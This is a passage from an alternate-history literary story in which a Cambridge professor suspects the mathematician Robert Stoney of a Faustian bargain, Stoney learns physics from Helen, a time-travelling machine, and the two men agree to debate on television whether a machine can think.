“ Then what was it , that made you choose me ? ” “ You really have n’t guessed ? ”
Helen took his free hand and held the fingers to her face ; it was a tender gesture , but much more like a daughter ’s than a lover ’s .
“ It ’s a warm night .
No one ’s skin should be this cold . ”
Robert gazed into her dark eyes , as playful as any human ’s , as serious , as proud .
Given the chance , perhaps any decent person would have plucked him from Quint ’s grasp .
But only one kind would feel a special obligation , as if they were repaying an ancient debt .
He said , “ You ’re a machine . ”
2
John Hamilton , Professor of Mediaeval and Renaissance English at Magdalene College , Cambridge , read the last letter in the morning ’s pile of fan mail with a growing sense of satisfaction .
The letter was from a young American , a twelve - year - old girl in Boston .
It opened in the usual way , declaring how much pleasure his books had given her , before going on to list her favourite scenes and characters .
As ever , Jack was delighted that the stories had touched someone deeply enough to prompt them to respond this way .
But it was the final paragraph that was by far the most gratifying :
However much other children might tease me , or grown - ups too when I ’m older , I will NEVER , EVER stop believing in the Kingdom of Nescia .
Sarah stopped believing , and she was locked out of the Kingdom forever .
At first that made me cry , and I could n’t sleep all night because I was afraid I might stop believing myself one day .
But I understand now that it ’s good to be afraid , because it will help me keep people from changing my mind .
And if you ’re not willing to believe in magic lands , of course you ca n’t enter them .
There ’s nothing even Belvedere himself can do to save you , then .
Jack refilled and lit his pipe , then reread the letter .
This was his vindication : the proof that through his books he could touch a young mind , and plant the seed of faith in fertile ground .
It made all the scorn of his jealous , stuck - up colleagues fade into insignificance .
Children understood the power of stories , the reality of myth , the need to believe in something beyond the dismal grey farce of the material world .
It was n’t a truth that could be revealed the “ adult ” way : through scholarship , or reason .
Least of all through philosophy , as Elizabeth Anscombe had shown him on that awful night at the Socratic Club .
A devout Christian herself , Anscombe had nonetheless taken all the arguments against materialism from his popular book , Signs and Wonders , and trampled them into the ground .
It had been an unfair match from the start : Anscombe was a professional philosopher , steeped in the work of everyone from Aquinas to Wittgenstein ; Jack knew the history of ideas in mediaeval Europe intimately , but he ’d lost interest in modern philosophy once it had been invaded by fashionable positivists .
And Signs and Wonders had never been intended as a scholarly work ; it had been good enough to pass muster with a sympathetic lay readership , but trying to defend his admittedly rough - and - ready mixture of common sense and useful shortcuts to faith against Anscombe ’s merciless analysis had made him feel like a country yokel stammering in front of a bishop .
Ten years later , he still burned with resentment at the humiliation she ’d put him through , but he was grateful for the lesson she ’d taught him .
His earlier books , and his radio talks , had not been a complete waste of time — but the harpy ’s triumph had shown him just how pitiful human reason was when it came to the great questions .
He ’d begun working on the stories of Nescia years before , but it was only when the dust had settled on his most painful defeat that he ’d finally recognised his true calling .
He removed his pipe , stood , and turned to face Oxford .
“ Kiss my arse , Elizabeth ! ” he growled happily , waving the letter at her .
This was a wonderful omen .
It was going to be a very good day .
There was a knock at the door of his study .
“ Come . ”
It was his brother , William .
Jack was puzzled — he had n’t even realised Willie was in town — but he nodded a greeting and motioned at the couch opposite his desk .
Willie sat , his face flushed from the stairs , frowning .
After a moment he said , “ This chap Stoney . ” “ Hmm ? ” Jack was only half listening as he sorted papers on his desk .
He knew from long experience that Willie would take forever to get to the point .
“ Did some kind of hush - hush work during the war , apparently . ”
“ Who did ? ” “ Robert Stoney .
Mathematician .
Used to be up at Manchester , but he ’s a Fellow of Kings , and now he ’s back in Cambridge .
Did some kind of secret war work .
Same thing as Malcolm Muggeridge , apparently .
No one ’s allowed to say what . ”
Jack looked up , amused .
He ’d heard rumours about Muggeridge , but they all revolved around the business of analysing intercepted German radio messages .
What conceivable use would a mathematician have been , for that ?
Sharpening pencils for the intelligence analysts , presumably .
“ What about him , Willie ? ” Jack asked patiently .
Willie continued reluctantly , as if he was confessing to something mildly immoral .
“ I paid him a visit yesterday .
Place called the Cavendish .
Old army friend of mine has a brother who works there .
Got the whole tour . ”
“ I know the Cavendish .
What ’s there to see ? ”
“ He ’s doing things , Jack .
Impossible things . ”
“ Impossible ? ” “ Looking inside people .
Putting it on a screen , like a television . ”
Jack sighed .
“ Taking X - rays ? ”
Willie snapped back angrily , “ I ’m not a fool ; I know what an X - ray looks like .
This is different .
You can see the blood flow .
You can watch your heart beating .
You can follow a sensation through the nerves from … fingertip to brain .
He says , soon he ’ll be able to watch a thought in motion . ” “ Nonsense . ” Jack scowled .
“ So he ’s invented some gadget , some fancy kind of X - ray machine .
What are you so agitated about ? ”
Willie shook his head gravely .
“ There ’s more .
That ’s just the tip of the iceberg .
He ’s only been back in Cambridge a year , and already the place is overflowing with … wonders . ”
He used the word begrudgingly , as if he had no choice , but was afraid of conveying more approval than he intended .
Jack was beginning to feel a distinct sense of unease .
“ What exactly is it you want me to do ? ” he asked .
Willie replied plainly , “ Go and see for yourself .
Go and see what he ’s up to . ”
The Cavendish Laboratory was a mid-Victorian building , designed to resemble something considerably older and grander .
It housed the entire Department of Physics , complete with lecture theatres ; the place was swarming with noisy undergraduates .
Jack had had no trouble arranging a tour : he ’d simply telephoned Stoney and expressed his curiosity , and no more substantial reason had been required .
Stoney had been allocated three adjoining rooms at the back of the building , and the “ spin resonance imager ” occupied most of the first .
Jack obligingly placed his arm between the coils , then almost jerked it out in fright when the strange , transected view of his muscles and veins appeared on the picture tube .
He wondered if it could be some kind of hoax , but he clenched his fist slowly and watched the image do the same , then made several unpredictable movements which it mimicked equally well .
“ I can show you individual blood cells , if you like , ” Stoney offered cheerfully .
Jack shook his head ; his current , unmagnified flaying was quite enough to take in .
Stoney hesitated , then added awkwardly , “ You might want to talk to your doctor at some point .
It ’s just that , your bone density ’s rather — ” He pointed to a chart on the screen beside the image .
“ Well , it ’s quite a bit below the normal range . ”
Jack withdrew his arm .
He ’d already been diagnosed with osteoporosis , and he ’d welcomed the news : it meant that he ’d taken a small part of Joyce ’s illness — the weakness in her bones — into his own body .
God was allowing him to suffer a little in her stead .
If Joyce were to step between these coils , what might that reveal ?
But there ’d be nothing to add to her diagnosis .
Besides , if he kept up his prayers , and kept up both their spirits , in time her remission would blossom from an uncertain reprieve into a fully - fledged cure .
He said , “ How does this work ? ” “ In a strong magnetic field , some of the atomic nuclei and electrons in your body are free to align themselves in various ways with the field . ”
Stoney must have seen Jack ’s eyes beginning to glaze over ; he quickly changed tack .
“ Think of it as being like setting a whole lot of spinning tops whirling , as vigorously as possible , then listening carefully as they slow down and tip over .
For the atoms in your body , that ’s enough to give some clues as to what kind of molecule , and what kind of tissue , they ’re in .
The machine listens to atoms in different places by changing the way it combines all the signals from billions of tiny antennae .
It ’s like a whispering gallery where we can play with the time that signals take to travel from different places , moving the focus back and forth through any part of your body , thousands of times a second . ”
Jack pondered this explanation .
Though it sounded complicated , in principle it was n’t that much stranger than X - rays .
“ The physics itself is old hat , ” Stoney continued , “ but for imaging , you need a very strong magnetic field , and you need to make sense of all the data you ’ve gathered .
Nevill Mott made the superconducting alloys for the magnets .
And I managed to persuade Rosalind Franklin from Birkbeck to collaborate with us , to help perfect the fabrication process for the computing circuits .
We cross -link lots of little Y - shaped DNA fragments , then selectively coat them with metal ; Rosalind worked out a way to use X - ray crystallography for quality control .
We paid her back with a purpose - built computer that will let her solve hydrated protein structures in real time , once she gets her hands on a bright enough X - ray source . ”
He held up a small , unprepossessing object , rimmed with protruding gold wires .
“ Each logic gate is roughly a hundred Ångstroms cubed , and we grow them in three - dimensional arrays .
That ’s a million , million , million switches in the palm of my hand . ”
Jack did n’t know how to respond to this claim .
Even when he could n’t quite follow the man there was something mesmerising about his ramblings , like a cross between William Blake and nursery talk .
“ If computers do n’t excite you , we ’re doing all kinds of other things with DNA . ”
Stoney ushered him into the next room , which was full of glassware , and seedlings in pots beneath strip lights .
Two assistants seated at a bench were toiling over microscopes ; another was dispensing fluids into test tubes with a device that looked like an overgrown eye - dropper .
“ There are a dozen new species of rice , corn , and wheat here .
They all have at least double the protein and mineral content of existing crops , and each one uses a different biochemical repertoire to protect itself against insects and fungi .
Farmers have to get away from monocultures ; it leaves them too vulnerable to disease , and too dependent on chemical pesticides . ”
Jack said , “ You ’ve bred these ?
All these new varieties , in a matter of months ? ”
“ No , no !
Instead of hunting down the heritable traits we needed in the wild , and struggling for years to produce cross - breeds bearing all of them , we designed every trait from scratch .
Then we manufactured DNA that would make the tools the plants need , and inserted it into their germ cells . ”
Jack demanded angrily , “ Who are you to say what a plant needs ? ”
Stoney shook his head innocently .
“ I took my advice from agricultural scientists , who took their advice from farmers .
They know what pests and blights they ’re up against .
Food crops are as artificial as Pekinese .
Nature did n’t hand them to us on a plate , and if they ’re not working as well as we need them to , nature is n’t going to fix them for us . ”
Jack glowered at him , but said nothing .
He was beginning to understand why Willie had sent him here .
The man came across as an enthusiastic tinkerer , but there was a breath - taking arrogance lurking behind the boyish exterior .
Stoney explained a collaboration he ’d brokered between scientists in Cairo , Bogotá , London and Calcutta , to develop vaccines for polio , smallpox , malaria , typhoid , yellow fever , tuberculosis , influenza and leprosy .
Some were the first of their kind ; others were intended as replacements for existing vaccines .
“ It ’s important that we create antigens without culturing the pathogens in animal cells that might themselves harbour viruses .
The teams are all looking at variants on a simple , cheap technique that involves putting antigen genes into harmless bacteria that will double as delivery vehicles and adjuvants , then freeze - drying them into spores that can survive tropical heat without refrigeration . ”
Jack was slightly mollified ; this all sounded highly admirable .
What business Stoney had instructing doctors on vaccines was another question .
Presumably his jargon made sense to them , but when exactly had this mathematician acquired the training to make even the most modest suggestions on the topic ?
“ You ’re having a remarkably productive year , ” he observed .
Stoney smiled .
“ The muse comes and goes for all of us .
But I ’m really just the catalyst in most of this .
I ’ve been lucky enough to find some people — here in Cambridge , and further afield — who ’ve been willing to chance their arm on some wild ideas .
They ’ve done the real work . ”
He gestured towards the next room .
“ My own pet projects are through here . ”
The third room was full of electronic gadgets , wired up to picture tubes displaying both phosphorescent words and images resembling engineering blueprints come to life .
In the middle of one bench , incongruously , sat a large cage containing several hamsters .
Stoney fiddled with one of the gadgets , and a face like a stylised drawing of a mask appeared on an adjacent screen .
The mask looked around the room , then said , “ Good morning , Robert .
Good morning , Professor Hamilton . ”
Jack said , “ You had someone record those words ? ”
The mask replied , “ No , Robert showed me photographs of all the teaching staff at Cambridge .
If I see anyone I know from the photographs , I greet them . ”
The face was crudely rendered , but the hollow eyes seemed to meet Jack’s .
Stoney explained , “ It has no idea what it ’s saying , of course .
It ’s just an exercise in face and voice recognition . ”
Jack responded stiffly , “ Of course . ”
Stoney motioned to Jack to approach and examine the hamster cage .
He obliged him .
There were two adult animals , presumably a breeding pair .
Two pink young were suckling from the mother , who reclined in a bed of straw .
“ Look closely , ” Stoney urged him .
Jack peered into the nest , then cried out an obscenity and backed away .
One of the young was exactly what it seemed .
The other was a machine , wrapped in ersatz skin , with a nozzle clamped to the warm teat .
“ That ’s the most monstrous thing I ’ve ever seen ! ” Jack ’s whole body was trembling .
“ What possible reason could you have to do that ? ”
Stoney laughed and made a reassuring gesture , as if his guest was a nervous child recoiling from a harmless toy .
“ It ’s not hurting her !
And the point is to discover what it takes for the mother to accept it .
To ‘ reproduce one ’s kind ’ means having some set of parameters as to what that is .
Scent , and some aspects of appearance , are important cues in this case , but through trial and error I ’ve also pinned down a set of behaviours that lets the simulacrum pass through every stage of the life cycle .
An acceptable child , an acceptable sibling , an acceptable mate . ”
Jack stared at him , nauseated .
“ These animals fuck your machines ? ” Stoney was apologetic .
“ Yes , but hamsters will fuck anything .
I ’ll really have to shift to a more discerning species , in order to test that properly . ”
Jack struggled to regain his composure .
“ What on Earth possessed you , to do this ? ”
“ In the long run , ” Stoney said mildly , “ I believe this is something we ’re going to need to understand far better than we do at present .
Now that we can map the structures of the brain in fine detail , and match its raw complexity with our computers , it ’s only a matter of a decade or so before we build machines that think .
“ That in itself will be a vast endeavour , but I want to ensure that it ’s not stillborn from the start .
There ’s not much point creating the most marvellous children in history , only to find that some awful mammalian instinct drives us to strangle them at birth . ”
Jack sat in his study drinking whisky .
He ’d telephoned Joyce after dinner , and they ’d chatted for a while , but it was n’t the same as being with her .
The weekends never came soon enough , and by Tuesday or Wednesday any sense of reassurance he ’d gained from seeing her had slipped away entirely .
It was almost midnight now .
After speaking to Joyce , he ’d spent three more hours on the telephone , finding out what he could about Stoney .
Milking his connections , such as they were ; Jack had only been at Cambridge for five years , so he was still very much an outsider .
Not that he ’d ever been admitted into any inner circles back at Oxford : he ’d always belonged to a small , quiet group of dissenters against the tide of fashion .
Whatever else might be said about the Tiddlywinks , they ’d never had their hands on the levers of academic power .
A year ago , while on sabbatical in Germany , Stoney had resigned suddenly from a position he ’d held at Manchester for a decade .
He ’d returned to Cambridge , despite having no official posting to take up .
He ’d started collaborating informally with various people at the Cavendish , until the head of the place , Mott , had invented a job description for him , and given him a modest salary , the three rooms Jack had seen , and some students to assist him .
Stoney ’s colleagues were uniformly amazed by his spate of successful inventions .
Though none of his gadgets were based on entirely new science , his skill at seeing straight to the heart of existing theories and plucking some practical consequence from them was unprecedented .
Jack had expected some jealous back - stabbing , but no one seemed to have a bad word to say about Stoney .
He was willing to turn his scientific Midas touch to the service of anyone who approached him , and it sounded to Jack as if every would - be skeptic or enemy had been bought off with some rewarding insight into their own field .
Stoney ’s personal life was rather murkier .
Half of Jack ’s informants were convinced that the man was a confirmed pansy , but others spoke of a beautiful , mysterious woman named Helen , with whom he was plainly on intimate terms .
Jack emptied his glass and stared out across the courtyard .
Was it pride , to wonder if he might have received some kind of prophetic vision ?
Fifteen years earlier , when he ’d written The Broken Planet , he ’d imagined that he ’d merely been satirising the hubris of modern science .
His portrait of the evil forces behind the sardonically named Laboratory Overseeing Various Experiments had been intended as a deadly serious metaphor , but he ’d never expected to find himself wondering if real fallen angels were whispering secrets in the ears of a Cambridge don .
How many times , though , had he told his readers that the devil ’s greatest victory had been convincing the world that he did not exist ?
The devil was not a metaphor , a mere symbol of human weakness : he was a real , scheming presence , acting in time , acting in the world , as much as God Himself .
And had n’t Faustus ’s damnation been sealed by the most beautiful woman of all time : Helen of Troy ?
Jack ’s skin crawled .
He ’d once written a humorous newspaper column called “ Letters from a Demon , ” in which a Senior Tempter offered advice to a less experienced colleague on the best means to lead the faithful astray .
Even that had been an exhausting , almost corrupting experience ; adopting the necessary point of view , however whimsically , had made him feel that he was withering inside .
The thought that a cross between the Faustbuch and The Broken Planet might be coming to life around him was too terrifying to contemplate .
He was no hero out of his own fiction — not even a mild - mannered Cedric Duffy , let alone a modern Pendragon .
And he did not believe that Merlin would rise from the woods to bring chaos to that hubristic Tower of Babel , the Cavendish Laboratory .
Nevertheless , if he was the only person in England who suspected Stoney ’s true source of inspiration , who else would act ?
Jack poured himself another glass .
There was nothing to be gained by procrastinating .
He would not be able to rest until he knew what he was facing : a vain , foolish overgrown boy who was having a run of good luck — or a vain , foolish overgrown boy who had sold his soul and imperilled all humanity .
“ A Satanist ?
You ’re accusing me of being a Satanist ? ”
Stoney tugged angrily at his dressing gown ; he ’d been in bed when Jack had pounded on the door .
Given the hour , it had been remarkably civil of him to accept a visitor at all , and he appeared so genuinely affronted now that Jack was almost prepared to apologise and slink away .
He said , “ I had to ask you — ” “ You have to be doubly foolish to be a Satanist , ” Stoney muttered .
“ Doubly ? ” “ Not only do you need to believe all the nonsense of Christian theology , you then have to turn around and back the preordained , guaranteed - to - fail , absolutely futile losing side . ”
He held up his hand , as if he believed he ’d anticipated the only possible objection to this remark , and wished to spare Jack the trouble of wasting his breath by uttering it .
“ I know , some people claim it ’s all really about some pre-Christian deity : Mercury , or Pan — guff like that .
But assuming that we ’re not talking about some complicated mislabelling of objects of worship , I really ca n’t think of anything more insulting .
You ’re comparing me to someone like … Huysmans , who was basically just a very dim Catholic . ”
Stoney folded his arms and settled back on the couch , waiting for Jack ’s response .
Jack ’s head was thick from the whisky ; he was n’t at all sure how to take this .
It was the kind of smart - arsed undergraduate drivel he might have expected from any smug atheist — but then , short of a confession , exactly what kind of reply would have constituted evidence of guilt ?
If you ’d sold your soul to the devil , what lie would you tell in place of the truth ?
Had he seriously believed that Stoney would claim to be a devout churchgoer , as if that were the best possible answer to put Jack off the scent ?
He had to concentrate on things he ’d seen with his own eyes , facts that could not be denied .
“ You ’re plotting to overthrow nature , bending the world to the will of man . ”
Stoney sighed .
“ Not at all .
More refined technology will help us tread more lightly .
We have to cut back on pollution and pesticides as rapidly as possible .
Or do you want to live in a world where all the animals are born as hermaphrodites , and half the Pacific islands disappear in storms ? ”
“ Do n’t try telling me that you ’re some kind of guardian of the animal kingdom .
You want to replace us all with machines ! ”
“ Does every Zulu or Tibetan who gives birth to a child , and wants the best for it , threaten you in the same way ? ”
Jack bristled .
“ I ’m not a racist .
A Zulu or Tibetan has a soul . ”
Stoney groaned and put his head in his hands .
“ It ’s half past one in the morning !
Ca n’t we have this debate some other time ? ”
Someone banged on the door .
Stoney looked up , disbelieving .
“ What is this ?
Grand Central Station ? ”
He crossed to the door and opened it .
A dishevelled , unshaven man pushed his way into the room .
“ Quint ?
What a pleasant — ” The intruder grabbed Stoney and slammed him against the wall .
Jack exhaled with surprise .
Quint turned bloodshot eyes on him .
“ Who the fuck are you ? ” “ John Hamilton .
Who the fuck are you ? ”
“ Never you mind .
Just stay put . ”
He jerked Stoney ’s arm up behind his back with one hand , while grinding his face into the wall with the other .
“ You ’re mine now , you piece of shit .
No one ’s going to protect you this time . ”
Stoney addressed Jack through a mouth squashed against the masonry .
“ Dith ith Pether Quinth , my own perthonal thpook .
I did make a Fauthtian bargain .
But with thtrictly temporal — ” “ Shut up ! ” Quint pulled a gun from his jacket and held it to Stoney ’s head .
Jack said , “ Steady on . ” “ Just how far do your connections go ? ” Quint screamed .
“ I ’ve had memos disappear , sources clam up — and now my superiors are treating me like some kind of traitor !
Well , do n’t worry : when I ’m through with you , I ’ll have the names of the entire network . ”
He turned to address Jack again .
“ And do n’t you think you ’re going anywhere . ”
Stoney said , “ Leave him out of dith .
He ’th at Magdalene .
You mutht know by now : all the thpieth are at Trinity . ”
Jack was shaken by the sight of Quint waving his gun around , but the implications of this drama came as something of a relief .
Stoney ’s ideas must have had their genesis in some secret war - time research project .
He had n’t made a deal with the devil after all , but he ’d broken the Official Secrets Act , and now he was paying the price .
Stoney flexed his body and knocked Quint backwards .
Quint staggered , but did n’t fall ; he raised his arm menacingly , but there was no gun in his hand .
Jack looked around to see where it had fallen , but he could n’t spot it anywhere .
Stoney landed a kick squarely in Quint ’s testicles ; barefoot , but Quint wailed with pain .
A second kick sent him sprawling .
Stoney called out , “ Luke ?
Luke !
Would you come and give me a hand ? ”
A solidly built man with tattooed forearms emerged from Stoney ’s bedroom , yawning and tugging his braces into place .
At the sight of Quint , he groaned .
“ Not again ! ” Stoney said , “ I ’m sorry . ”
Luke shrugged stoically .
The two of them managed to grab hold of Quint , then they dragged him struggling out the door .
Jack waited a few seconds , then searched the floor for the gun .
But it was n’t anywhere in sight , and it had n’t slid under the furniture ; none of the crevices where it might have ended up were so dark that it would have been lost in shadow .
It was not in the room at all .
Jack went to the window and watched the three men cross the courtyard , half expecting to witness an assassination .
But Stoney and his lover merely lifted Quint into the air between them , and tossed him into a shallow , rather slimy - looking pond .
Jack spent the ensuing days in a state of turmoil .
He was n’t ready to confide in anyone until he could frame his suspicions clearly , and the events in Stoney ’s rooms were difficult to interpret unambiguously .
He could n’t state with absolute certainty that Quint ’s gun had vanished before his eyes .
But surely the fact that Stoney was walking free proved that he was receiving supernatural protection ?
And Quint himself , confused and demoralised , had certainly had the appearance of a man who ’d been demonically confounded at every turn .
If this was true , though , Stoney must have bought more with his soul than immunity from worldly authority .
The knowledge itself had to be Satanic in origin , as the legend of Faustus described it .
Tollers had been right , in his great essay “ Mythopoesis ” : myths were remnants of man ’s pre-lapsarian capacity to apprehend , directly , the great truths of the world .
Why else would they resonate in the imagination , and survive from generation to generation ?
By Friday , a sense of urgency gripped him .
He could n’t take his confusion back to Potter ’s Barn , back to Joyce and the boys .
This had to be resolved , if only in his own mind , before he returned to his family .
With Wagner on the gramophone , he sat and meditated on the challenge he was facing .
Stoney had to be thwarted , but how ?
Jack had always said that the Church of England — apparently so quaint and harmless , a Church of cake stalls and kindly spinsters — was like a fearsome army in the eyes of Satan .
But even if his master was quaking in Hell , it would take more than a few stern words from a bicycling vicar to force Stoney to abandon his obscene plans .
But Stoney ’s intentions , in themselves , did n’t matter .
He ’d been granted the power to dazzle and seduce , but not to force his will upon the populace .
What mattered was how his plans were viewed by others .
And the way to stop him was to open people ’s eyes to the true emptiness of his apparent cornucopia .
The more he thought and prayed about it , the more certain Jack became that he ’d discerned the task required of him .
No denunciation from the pulpits would suffice ; people would n’t turn down the fruits of Stoney ’s damnation on the mere say - so of the Church .
Why would anyone reject such lustrous gifts , without a carefully reasoned argument ?
Jack had been humiliated once , defeated once , trying to expose the barrenness of materialism .
But might that not have been a form of preparation ?
He ’d been badly mauled by Anscombe , but she ’d made an infinitely gentler enemy than the one he now confronted .
He had suffered from her taunts — but what was suffering , if not the chisel God used to shape his children into their true selves ?
His role was clear , now .
He would find Stoney ’s intellectual Achilles heel , and expose it to the world .
He would debate him .
3
Robert gazed at the blackboard for a full minute , then started laughing with delight .
“ That ’s so beautiful ! ” “ Is n’t it ? ” Helen put down the chalk and joined him on the couch .
“ Any more symmetry , and nothing would happen : the universe would be full of crystalline blankness .
Any less , and it would all be uncorrelated noise . ”
Over the months , in a series of tutorials , Helen had led him through a small part of the century of physics that had separated them at their first meeting , down to the purely algebraic structures that lay beneath spacetime and matter .
Mathematics catalogued everything that was not self - contradictory ; within that vast inventory , physics was an island of structures rich enough to contain their own beholders .
Robert sat and mentally reviewed everything he ’d learnt , trying to apprehend as much as he could in a single image .
As he did , a part of him waited fearfully for a sense of disappointment , a sense of anticlimax .
He might never see more deeply into the nature of the world .
In this direction , at least , there was nothing more to be discovered .
But anticlimax was impossible .
To become jaded with this was impossible .
However familiar he became with the algebra of the universe , it would never grow less marvellous .
Finally he asked , “ Are there other islands ? ”
Not merely other histories , sharing the same underlying basis , but other realities entirely .
“ I suspect so , ” Helen replied .
“ People have mapped some possibilities .
I do n’t know how that could ever be confirmed , though . ”
Robert shook his head , sated .
“ I wo n’t even think about that .
I need to come down to Earth for a while . ”
He stretched his arms and leant back , still grinning .
Helen said , “ Where ’s Luke today ?
He usually shows up by now , to drag you out into the sunshine . ”
The question wiped the smile from Robert ’s face .
“ Apparently I make poor company .
Being insufficiently fanatical about darts and football . ”
“ He ’s left you ? ”
Helen reached over and squeezed his hand sympathetically .
A little mockingly , too .
Robert was annoyed ; she never said anything , but he always felt that she was judging him .
“ You think I should grow up , do n’t you ?
Find someone more like myself .
Some kind of soulmate . ”
He ’d meant the word to sound sardonic , but it emerged rather differently .
“ It ’s your life , ” she said .
A year before , that would have been a laughable claim , but it was almost the truth now .
There was a de facto moratorium on prosecutions , while the recently acquired genetic and neurological evidence was being assessed by a parliamentary subcommittee .
Robert had helped plant the seeds of the campaign , but he ’d played no real part in it ; other people had taken up the cause .
In a matter of months , it was possible that Quint ’s cage would be smashed , at least for everyone in Britain .
The prospect filled him with a kind of vertigo .
He might have broken the laws at every opportunity , but they had still moulded him .
The cage might not have left him crippled , but he’d be lying to himself if he denied that he ’d been stunted .
He said , “ Is that what happened , in your past ?
I ended up in some … lifelong partnership ? ”
As he spoke the words , his mouth went dry , and he was suddenly afraid that the answer would be yes .
With Chris .
The life he ’d missed out on was a life of happiness with Chris .
“ No . ” “ Then … what ? ” he pleaded .
“ What did I do ?
How did I live ? ”
He caught himself , suddenly self - conscious , but added , “ You ca n’t blame me for being curious . ”
Helen said gently , “ You do n’t want to know what you ca n’t change .
All of that is part of your own causal past now , as much as it is of mine . ”
“ If it ’s part of my own history , ” Robert countered , “ do n’t I deserve to know it ?
This man was n’t me , but he brought you to me . ”
Helen considered this .
“ You accept that he was someone else ?
Not someone whose actions you ’re responsible for ? ” “ Of course . ”
She said , “ There was a trial , in 1952 .
For ‘ Gross Indecency contrary to Section 11 of the Criminal Amendment Act of 1885 . ’
He was n’t imprisoned , but the court ordered hormone treatments . ”
“ Hormone treatments ? ” Robert laughed .
“ What — testosterone , to make him more of a man ? ” “ No , oestrogen .
Which in men reduces the sex drive .
There are side - effects , of course .
Gynaecomorphism , among other things . ”
Robert felt physically sick .
They ’d chemically castrated him , with drugs that had made him sprout breasts .
Of all the bizarre abuse to which he ’d been subjected , nothing had been as horrifying as that .
Helen continued , “ The treatment lasted six months , and the effects were all temporary .
But two years later , he took his own life .
It was never clear exactly why . ”
Robert absorbed this in silence .
He did n’t want to know anything more .
After a while , he said , “ How do you bear it ?
Knowing that in some branch or other , every possible form of humiliation is being inflicted on someone ? ”
Helen said , “ I do n’t bear it .
I change it .
That ’s why I ’m here . ”
Robert bowed his head .
“ I know .
And I ’m grateful that our histories collided .
But … how many histories do n’t ? ”
He struggled to find an example , though it was almost too painful to contemplate ; since their first conversation , it was a topic he ’d deliberately pushed to the back of his mind .
“ There ’s not just an unchangeable Auschwitz in each of our pasts , there are an astronomical number of others — along with an astronomical number of things that are even worse . ”
Helen said bluntly , “ That ’s not true . ” “ What ? ” Robert looked up at her , startled .
She walked to the blackboard and erased it .
“ Auschwitz has happened , for both of us , and no one I ’m aware of has ever prevented it — but that does n’t mean that nobody stops it , anywhere . ”
She began sketching a network of fine lines on the blackboard .
“ You and I are having this conversation in countless microhistories — sequences of events where various different things happen with subatomic particles throughout the universe — but that ’s irrelevant to us , we ca n’t tell those strands apart , so we might as well treat them all as one history . ”
She pressed the chalk down hard to make a thick streak that covered everything she ’d drawn .
“ The quantum decoherence people call this ‘ coarse graining ’ .
Summing over all these indistinguishable details is what gives rise to classical physics in the first place .
“ Now , ‘ the two of us ’ would have first met in many perceivably different coarse - grained histories — and furthermore , you ’ve since diverged by making different choices , and experiencing different external possibilities , after those events . ”
She sketched two intersecting ribbons of coarse - grained histories , and then showed each history diverging further .
“ World War II and the Holocaust certainly happened in both of our pasts — but that ’s no proof that the total is so vast that it might as well be infinite .
Remember , what stops us successfully intervening is the fact that we ’re reaching back to a point where some of the parallel interventions start to bite their own tail .
So when we fail , it ca n’t be counted twice : it ’s just confirming what we already know . ”
Robert protested , “ But what about all the versions of ’ 30s Europe that do n’t happen to lie in either your past or mine ?
Just because we have no direct evidence for a Holocaust in those branches , that hardly makes it unlikely . ”
Helen said , “ Not unlikely per se , without intervention .
But not fixed in stone either .
We ’ll keep trying , refining the technology , until we can reach branches where there ’s no overlap with our own past in the ’30s .
And there must be other , separate ribbons of intervention that happen in histories we can never even know about . ”
Robert was elated .
He ’d imagined himself clinging to a rock of improbable good fortune in an infinite sea of suffering — struggling to pretend , for the sake of his own sanity , that the rock was all there was .
But what lay around him was not inevitably worse ; it was merely unknown .
In time , he might even play a part in ensuring that every last tragedy was not repeated across billions of worlds .
He reexamined the diagram .
“ Hang on .
Intervention does n’t end divergence , though , does it ?
You reached us , a year ago , but in at least some of the histories spreading out from that moment , wo n’t we still have suffered all kinds of disasters , and reacted in all kinds of self - defeating ways ? ”
“ Yes , ” Helen conceded , “ but fewer than you might think .
If you merely listed every sequence of events that superficially appeared to have a non-zero probability , you ’d end up with a staggering catalogue of absurdist tragedies .
But when you calculate everything more carefully , and take account of Planck - scale effects , it turns out to be nowhere near as bad .
There are no coarse - grained histories where boulders assemble themselves out of dust and rain from the sky , or everyone in London or Madras goes mad and slaughters their children .
Most macroscopic systems end up being quite robust — people included .
Across histories , the range of natural disasters , human stupidity , and sheer bad luck is n’t overwhelmingly greater than the range you ’re aware of from this history alone . ”
Robert laughed .
“ And that ’s not bad enough ? ” “ Oh , it is .
But that ’s the best thing about the form I ’ve taken . ”
“ I ’m sorry ? ” Helen tipped her head and regarded him with an expression of disappointment .
“ You know , you ’re still not as quick on your feet as I ’d expected . ”
Robert ’s face burned , but then he realised what he ’d missed , and his resentment vanished .
“ You do n’t diverge ?
Your hardware is designed to end the process ?
Your environment , your surroundings , will still split you into different histories — but on a coarse - grained level , you do n’t contribute to the process yourself ? ”
“ That ’s right . ” Robert was speechless .
Even after a year , she could still toss him a hand grenade like this .
Helen said , “ I ca n’t help living in many worlds ; that ’s beyond my control .
But I do know that I ’m one person .
Faced with a choice that puts me on a knife - edge , I know I wo n’t split and take every path . ”
Robert hugged himself , suddenly cold .
“ Like I do .
Like I have .
Like all of us poor creatures of flesh . ”
Helen came and sat beside him .
“ Even that ’s not irrevocable .
Once you ’ve taken this form — if that ’s what you choose — you can meet your other selves , reverse some of the scatter .
Give some a chance to undo what they ’ve done . ”
This time , Robert grasped her meaning at once .
“ Gather myself together ?
Make myself whole ? ”
Helen shrugged .
“ If it ’s what you want .
If you see it that way . ”
He stared back at her , disoriented .
Touching the bedrock of physics was one thing , but this possibility was too much to take in .
Someone knocked on the study door .
The two of them exchanged wary glances , but it was n’t Quint , back for more punishment .
It was a porter bearing a telegram .
When the man had left , Robert opened the envelope .
“ Bad news ? ” Helen asked .
He shook his head .
“ Not a death in the family , if that ’s what you meant .
It ’s from John Hamilton .
He ’s challenging me to a debate .
On the topic ‘ Can A Machine Think ? ’ ”
“ What , at some university function ? ” “ No .
On the BBC .
Four weeks from tomorrow . ”
He looked up .
“ Do you think I should do it ? ” “ Radio or television ? ” Robert reread the message .
“ Television . ”
Helen smiled .
“ Definitely .
I ’ll give you some tips . ”
“ On the subject ? ” “ No !
That would be cheating . ”
She eyed him appraisingly .
“ You can start by throwing out your electric razor .
Get rid of the permanent five o’clock shadow . ”
Robert was hurt .
“ Some people find that quite attractive . ”
Helen replied firmly , “ Trust me on this . ”
The BBC sent a car to take Robert down to London .
Helen sat beside him in the back seat .
“ Are you nervous ? ” she asked .
“ Nothing that an hour of throwing up wo n’t cure . ”
Hamilton had suggested a live broadcast , “ to keep things interesting , ” and the producer had agreed .
Robert had never been on television ; he ’d taken part in a couple of radio discussions on the future of computing , back when the Mark I had first come into use , but even those had been taped .
